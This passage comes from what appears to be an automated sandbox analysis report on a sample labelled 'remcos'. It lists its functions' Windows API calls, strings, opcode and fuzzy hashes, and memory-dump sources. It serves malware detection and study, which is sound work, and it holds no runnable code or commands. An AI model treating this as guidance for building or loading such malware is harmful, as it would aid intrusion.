                                                                                                                                • Associated: 00000009.00000002.2194413421.00000000001FF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_9_2_1f0000_remcos.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ?terminate@@CurrentImageNonwritable
                                                                                                                                • String ID: csm$csm
                                                                                                                                • API String ID: 3343398186-3733052814
                                                                                                                                • Opcode ID: 42adb0c5fbff6520401afc29dbb1921fb9da70bf540a2ab6d86685a344654734
                                                                                                                                • Instruction ID: 7f192ba832e721848a8f337fa291d3de7578aa2dc07e1e5f6c2589f87c8d3ef9
                                                                                                                                • Opcode Fuzzy Hash: 42adb0c5fbff6520401afc29dbb1921fb9da70bf540a2ab6d86685a344654734
                                                                                                                                • Instruction Fuzzy Hash: EB51AF34A0020C9BCF10EF68D884EBEBBA5AF44328F148195EA199B292D772DD55CB91
                                                                                                                                Function 001F3CF0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 94libraryloaderCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • LoadLibraryW.KERNEL32(Msi.dll), ref: 001F3D10
                                                                                                                                • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 001F3D29
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000009.00000002.2194381605.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                • Associated: 00000009.00000002.2194360866.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000009.00000002.2194413421.00000000001FD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000009.00000002.2194413421.00000000001FF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_9_2_1f0000_remcos.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                                                • String ID: DllGetClassObject$Msi.dll
                                                                                                                                • API String ID: 2574300362-3279299384
                                                                                                                                • Opcode ID: c7673afea4f77bf0de94a0e9b11b247a536f2a0d69a7da646a6357c5a3b6448c
                                                                                                                                • Instruction ID: bb7fbbf39176a2ec9f520fb7cc56faa5349dbdda9589422a666a02d1b15e8455
                                                                                                                                • Opcode Fuzzy Hash: c7673afea4f77bf0de94a0e9b11b247a536f2a0d69a7da646a6357c5a3b6448c
                                                                                                                                • Instruction Fuzzy Hash: 30315E35A10218EFCB04DBA8DD54D7EB7B9FF487107010099E916E36A0DB70AE41DB90
                                                                                                                                Function 001F3DFA Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 58libraryloaderCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • LoadLibraryW.KERNEL32(Msi.dll,00000000,00000000,?,?,?,001F76B2), ref: 001F3E19
                                                                                                                                • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 001F3E2E
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000009.00000002.2194381605.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                • Associated: 00000009.00000002.2194360866.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000009.00000002.2194413421.00000000001FD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000009.00000002.2194413421.00000000001FF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_9_2_1f0000_remcos.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                                                • String ID: DllGetClassObject$Msi.dll
                                                                                                                                • API String ID: 2574300362-3279299384
                                                                                                                                • Opcode ID: 636ce52cfbb6769504c4513d43d9f113e0c54aab7fa14e681c5a167f526139c0
                                                                                                                                • Instruction ID: 580ccf75eb5b0f9a821a14354bb2fccdeefbc1d63a993cd3c94a81c81e63daf8
                                                                                                                                • Opcode Fuzzy Hash: 636ce52cfbb6769504c4513d43d9f113e0c54aab7fa14e681c5a167f526139c0
                                                                                                                                • Instruction Fuzzy Hash: 9E115E71B50619AFDB00DB64DD48E7A77A9EF08765F004058E905E3690E730EE40DB90
                                                                                                                                Function 001F8A55 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 52librarysleeploaderCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • Sleep.KERNEL32(0000000A), ref: 001F8A77
                                                                                                                                • LoadLibraryW.KERNEL32(COMCTL32), ref: 001F8AA1
                                                                                                                                • GetProcAddress.KERNEL32(?), ref: 001F8AC1
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000009.00000002.2194381605.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                • Associated: 00000009.00000002.2194360866.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000009.00000002.2194413421.00000000001FD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000009.00000002.2194413421.00000000001FF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_9_2_1f0000_remcos.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: AddressLibraryLoadProcSleep
                                                                                                                                • String ID: COMCTL32
                                                                                                                                • API String ID: 188063004-3719691325
                                                                                                                                • Opcode ID: 000a42b15d5658cd69377ddd1684402032246dd4fdf0b074942a7aa305618e59
                                                                                                                                • Instruction ID: f120e1a6301f8eba8729694c88c9e1e34e98e9f48723170437dc70de8f195ef5
                                                                                                                                • Opcode Fuzzy Hash: 000a42b15d5658cd69377ddd1684402032246dd4fdf0b074942a7aa305618e59
                                                                                                                                • Instruction Fuzzy Hash: 0401B132604219AFD719DB799D1963A7AA9EB82350F08043EE601D7250EF70DC41DBE0
                                                                                                                                Function 001F5F66 Relevance: 6.2, APIs: 3, Strings: 1, Instructions: 159COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000009.00000002.2194381605.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                • Associated: 00000009.00000002.2194360866.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000009.00000002.2194413421.00000000001FD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000009.00000002.2194413421.00000000001FF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_9_2_1f0000_remcos.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: memcpy
                                                                                                                                • String ID: `
                                                                                                                                • API String ID: 3510742995-2679148245
                                                                                                                                • Opcode ID: 22cc49c760ed817d82a9f6d9a9af561a998335de2e3d08d25fca75c9c41e2a2f
                                                                                                                                • Instruction ID: ebb5e4b197e0cda8c16af7d05924e6f1fdf56be817508bbc463e12686cfac1e9
                                                                                                                                • Opcode Fuzzy Hash: 22cc49c760ed817d82a9f6d9a9af561a998335de2e3d08d25fca75c9c41e2a2f
                                                                                                                                • Instruction Fuzzy Hash: 3A51CB72A00229EFCB24DFACC8855BAB7B5FF58310B654555FA14EB380EB71AE40C790
                                                                                                                                Function 001F4970 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 130stringCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • lstrcmpW.KERNEL32(?,001F13CC,?,mewuifsoarpcvxgh!), ref: 001F4A83
                                                                                                                                • lstrcmpW.KERNEL32(?,001F13D0,?,mewuifsoarpcvxgh!), ref: 001F4A93
                                                                                                                                • lstrcmpW.KERNEL32(?,001F13D8,?,mewuifsoarpcvxgh!), ref: 001F4AA3
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000009.00000002.2194381605.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                • Associated: 00000009.00000002.2194360866.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000009.00000002.2194413421.00000000001FD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000009.00000002.2194413421.00000000001FF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_9_2_1f0000_remcos.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: lstrcmp
                                                                                                                                • String ID: mewuifsoarpcvxgh!
                                                                                                                                • API String ID: 1534048567-2729521250
                                                                                                                                • Opcode ID: 3d17892483e0df6188d4b6a44bd8f5112226b16af2a8b545de4fd8c48c26ee8d
                                                                                                                                • Instruction ID: 8ccf99c85deab868fbdfc063f4a5766edb9f4761d03d0080cf70922262f1ab79
                                                                                                                                • Opcode Fuzzy Hash: 3d17892483e0df6188d4b6a44bd8f5112226b16af2a8b545de4fd8c48c26ee8d
                                                                                                                                • Instruction Fuzzy Hash: BA41A332B9021DEBDB219BA5E891ABFB3B5FF44710F14402AEB42E7290E7749D81C754
                                                                                                                                Function 001F9280 Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 001F9C98: GetModuleHandleW.KERNEL32(00000000), ref: 001F9C9F
                                                                                                                                • __set_app_type.MSVCRT ref: 001F9292
                                                                                                                                • __p__fmode.MSVCRT ref: 001F92A8
                                                                                                                                • __p__commode.MSVCRT ref: 001F92B6
                                                                                                                                • __setusermatherr.MSVCRT ref: 001F92D7
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000009.00000002.2194381605.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                • Associated: 00000009.00000002.2194360866.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000009.00000002.2194413421.00000000001FD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000009.00000002.2194413421.00000000001FF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_9_2_1f0000_remcos.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: HandleModule__p__commode__p__fmode__set_app_type__setusermatherr
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1632413811-0
                                                                                                                                • Opcode ID: c72cf080ea621358ab469d9f43201477d9b1fae65b4892c86c301438786dd137
                                                                                                                                • Instruction ID: 13107da6b0209236b30d55ebfe964551b50cbe7a812f9b8e0790b6897b0a6d99
                                                                                                                                • Opcode Fuzzy Hash: c72cf080ea621358ab469d9f43201477d9b1fae65b4892c86c301438786dd137
                                                                                                                                • Instruction Fuzzy Hash: BEF0157410830CDFC319BB30FD1A6383BA2BB15321B10061AE56286AF1CF3580C5EE90
                                                                                                                                Function 001F3F4C Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 243COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • StgOpenStorage.OLE32(?,00000000,00000020,00000000,00000000,?), ref: 001F3F75
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000009.00000002.2194381605.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                • Associated: 00000009.00000002.2194360866.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000009.00000002.2194413421.00000000001FD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000009.00000002.2194413421.00000000001FF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_9_2_1f0000_remcos.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: OpenStorage
                                                                                                                                • String ID: &
                                                                                                                                • API String ID: 222319337-1010288
                                                                                                                                • Opcode ID: 291427b56ea1d037264edd0b6bfdab6f0b9fecfdf5a80847fd8e09ada27586a6
                                                                                                                                • Instruction ID: 3b2c7a0582a5402ac01ea03e48b2cf5852f612501cebf45c5f5238942238b91f
                                                                                                                                • Opcode Fuzzy Hash: 291427b56ea1d037264edd0b6bfdab6f0b9fecfdf5a80847fd8e09ada27586a6
                                                                                                                                • Instruction Fuzzy Hash: 29910970A10218AFEB18DFA4ED99EBEB7B9FF54315B044528F516E7290DB20BD44CB50
                                                                                                                                Function 001F612F Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 145COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • IsCharAlphaNumericW.USER32(?,00000000,00000104,00000000,?,?,?,?,?,001F6B65,?,?,?), ref: 001F614F
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000009.00000002.2194381605.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                • Associated: 00000009.00000002.2194360866.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000009.00000002.2194413421.00000000001FD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000009.00000002.2194413421.00000000001FF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_9_2_1f0000_remcos.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: AlphaCharNumeric
                                                                                                                                • String ID: "$Property value is too long.
                                                                                                                                • API String ID: 1535711457-3969759159
                                                                                                                                • Opcode ID: b6ea7bcd2819d7b6a32a97b7cd5ec38e98df571e84d808a141d2a451cbc1f31c
                                                                                                                                • Instruction ID: 42dcf8a79000fbeadd0c6882641cdc9f0b7caa4f29e80ab8d1aa3bd704df6d51
                                                                                                                                • Opcode Fuzzy Hash: b6ea7bcd2819d7b6a32a97b7cd5ec38e98df571e84d808a141d2a451cbc1f31c
                                                                                                                                • Instruction Fuzzy Hash: F241E875E04139DBCB34EFA9844057AB3F2EFA8710B648425EAC5E7284F7358D82D7A0
                                                                                                                                Function 001F88B4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52sleeplibraryloaderCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • Sleep.KERNEL32(0000000A), ref: 001F88D6
                                                                                                                                • GetProcAddress.KERNEL32(?), ref: 001F891F
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000009.00000002.2194381605.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                • Associated: 00000009.00000002.2194360866.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000009.00000002.2194413421.00000000001FD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000009.00000002.2194413421.00000000001FF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_9_2_1f0000_remcos.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: AddressProcSleep
                                                                                                                                • String ID: OLE32
                                                                                                                                • API String ID: 1175476452-2276369563
                                                                                                                                • Opcode ID: ef8189b29f2b5c78738fe2bda461e4ec450c4360b9a100977527de20103848a9
                                                                                                                                • Instruction ID: 61e5caf7d7929383215b154492f423babda4ab404da2bfeb261f60bc5e75e822
                                                                                                                                • Opcode Fuzzy Hash: ef8189b29f2b5c78738fe2bda461e4ec450c4360b9a100977527de20103848a9
                                                                                                                                • Instruction Fuzzy Hash: 3C01D432604259ABDB19DB759E2A73E3AE9EB85314F04043DEA41D7250EFB0DC41C7E1
                                                                                                                                Function 001F8D4E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52sleeplibraryloaderCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • Sleep.KERNEL32(0000000A), ref: 001F8D70
                                                                                                                                • GetProcAddress.KERNEL32(?), ref: 001F8DB9
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000009.00000002.2194381605.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                • Associated: 00000009.00000002.2194360866.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000009.00000002.2194413421.00000000001FD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000009.00000002.2194413421.00000000001FF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_9_2_1f0000_remcos.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: AddressProcSleep
                                                                                                                                • String ID: KERNEL32
                                                                                                                                • API String ID: 1175476452-1217789123
                                                                                                                                • Opcode ID: c29653a3493884a6b59467dd3a2249cf44b89c2bb21b9e8154f4c285e00557df
                                                                                                                                • Instruction ID: 08437dda18ca980eae0a104379b4670bd516fd8d7d46108dfcf626d44f0c528d
                                                                                                                                • Opcode Fuzzy Hash: c29653a3493884a6b59467dd3a2249cf44b89c2bb21b9e8154f4c285e00557df
                                                                                                                                • Instruction Fuzzy Hash: 7F01B171604258ABDB299BB9DE2977A3A99EF92314F08043EEA45D7290DF70DC41C7D0